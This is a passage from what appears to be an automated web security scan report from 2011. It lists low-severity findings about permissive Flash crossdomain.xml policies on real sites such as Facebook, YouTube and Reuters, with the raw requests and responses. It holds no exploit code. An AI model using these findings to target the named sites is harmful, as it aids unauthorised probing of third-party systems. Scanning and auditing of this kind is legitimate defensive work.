<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.99. http://rd.rlcdn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rd.rlcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 500
Last-Modified: Fri, 02 Sep 2011 17:41:18 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.casualcollective.com" />
<allow-access-from domain="*.tubemogul.com" />
<allow-access-from domain="*.inplay.tubemogul.com" />
<allow-access-from domain="*.grooveshark.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adotube.com" />
...[SNIP]...

6.100. http://rtq.careerbuilder.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rtq.careerbuilder.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rtq.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL43
Date: Sun, 04 Sep 2011 00:57:57 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.101. http://search.charlotteobserver.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://search.charlotteobserver.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.charlotteobserver.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:44 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT
ETag: "ea0d60-df-4b2aab16"
Accept-Ranges: bytes
Content-Length: 223
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.charlotteobserver.com" />

...[SNIP]...

6.102. http://search2.sacbee.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://search2.sacbee.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search2.sacbee.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:50 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Accept-Ranges: bytes
Content-Length: 373
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.103. http://snas.nbcuni.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:08 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

6.104. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Date: Sun, 04 Sep 2011 01:12:40 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.105. http://syndication.mmismm.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:12:23 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:22:10 GMT
ETag: "10e-4a8db7b7df880"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

6.106. http://www.careerbuilder.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR9
Date: Sun, 04 Sep 2011 01:25:12 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.107. http://www.cars.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cars.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 14 May 2009 14:15:36 GMT
ETag: "9c4f-27a-f632f200"
Accept-Ranges: bytes
Content-Length: 634
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/xml
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:27 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.cars.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.2o7.net" />
...[SNIP]...

6.108. http://www.charlotteobserver.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT
ETag: "ea0d60-df-4b2aab16"
Content-Type: application/xml
Cache-Control: max-age=531
Date: Sun, 04 Sep 2011 01:00:13 GMT
Content-Length: 223
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.charlotteobserver.com" />

...[SNIP]...

6.109. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.198.64
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.110. http://www.fansonly.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.fansonly.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fansonly.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:17 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Accept-Ranges: bytes
Content-Length: 909
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.111. http://www.foxsportssouthwest.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.foxsportssouthwest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxsportssouthwest.com

Response

HTTP/1.0 200 OK
Server: nginx/1.0.3
Content-Type: application/xml
Last-Modified: Mon, 08 Nov 2010 18:43:43 GMT
ETag: "1f2f8aa-d9-4948f00e3b5c0"
Accept-Ranges: bytes
Content-Length: 217
Date: Sun, 04 Sep 2011 01:26:09 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.edgecastcdn.net" />
<allow-access-from domain="*.brandaffinity.net" />
<allow-access-from domain="*.netbat.com" />
</cro
...[SNIP]...

6.112. http://www.latimes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.latimes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 438
Content-Type: text/xml
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 03 Mar 2011 02:18:58 GMT
ETag: "1b6-4d6efa92"
Accept-Ranges: bytes
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.wp.com"/>
<allow-access-from domain="s-ssl.wordpress.com"/>
<allow-access-from domain="latimesphoto.wordpress.com"/>
<allow-access-from domain="framework.latimes.com"/>
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

6.113. http://www.myspace.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Expires: -1
Last-Modified: Thu, 01 Sep 2011 03:28:02 GMT
Accept-Ranges: bytes
ETag: "0d70275768cc1:0"
Server: Microsoft-IIS/7.5
X-Server: 979f881f10211383746f03754b03c7d9bbf75b93f28b477f
X-PoweredBy: Chunk from Goonies
Date: Sun, 04 Sep 2011 01:26:20 GMT
Connection: keep-alive
Content-Length: 680
X-Vertical: profileidentities

<cross-domain-policy>
   <allow-access-from domain="*.fimservecdn.com" />
   <allow-access-from domain="lads.myspace.cn" />
   <allow-access-from domain="*.ilike.com" />
   <allow-http-request-headers-fro
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" />
   <allow-access-from domain="*.myspace.com" />
...[SNIP]...

6.114. http://www.reuters.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:42 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:49:42 GMT
browser-expires: Sun, 4 Sep 2011 00:44:42 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 857
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.reutersmedia.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.115. http://www.sacbee.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Server: Apache/1.3.41
Content-Type: application/xml
Cache-Control: max-age=175
Date: Sun, 04 Sep 2011 00:57:44 GMT
Content-Length: 373
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.116. http://www.sologig.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sologig.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sologig.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL39
Date: Sun, 04 Sep 2011 01:27:38 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.117. http://www.stumbleupon.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:10:01 GMT
Content-Type: application/xml
Content-Length: 460
Date: Sun, 04 Sep 2011 01:27:58 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

6.118. http://www.tsn.ca/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tsn.ca
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tsn.ca

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: text/xml
Last-Modified: Tue, 16 Aug 2011 18:52:44 GMT
Accept-Ranges: bytes
ETag: "f5ca3faf455ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:28 GMT
Connection: close
Content-Length: 820

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="watch.tsn.ca" />
<allow-access-from domain="watch.ctv.ca" />
<allow-access-from domain="*.tsn.ca" />
       <allow-access-from domain="tsn.ca" />
<allow-access-from domain="*.ctvdigital.com" />
<allow-access-from domain="*.ctvdigital.ca" />
<allow-access-from domain="images.tsn.ca.edgesuite.net" />
<allow-access-from domain="*.mtv.ca" />
<allow-access-from domain="*.edgefcs.net" />
       <allow-access-from domain="ads.itravel2000.com"/>
       <allow-access-from domain="*.curltv.com"/>
<allow-access-from domain="*.daelgren.com"/>
    <allow-access-from domain="*.streamtheworld.com"/>
...[SNIP]...

6.119. http://www.usatoday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:43 GMT
Accept-Ranges: bytes
ETag: "59d64d1117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.120. http://www.wtp101.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:12:32 GMT
ETag: 1300113893320
LastModified: Mon, 14 Mar 2011 14:44:53 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

6.121. http://www.youtube.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Sun, 04 Sep 2011 01:28:37 GMT
Expires: Sun, 04 Sep 2011 01:28:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

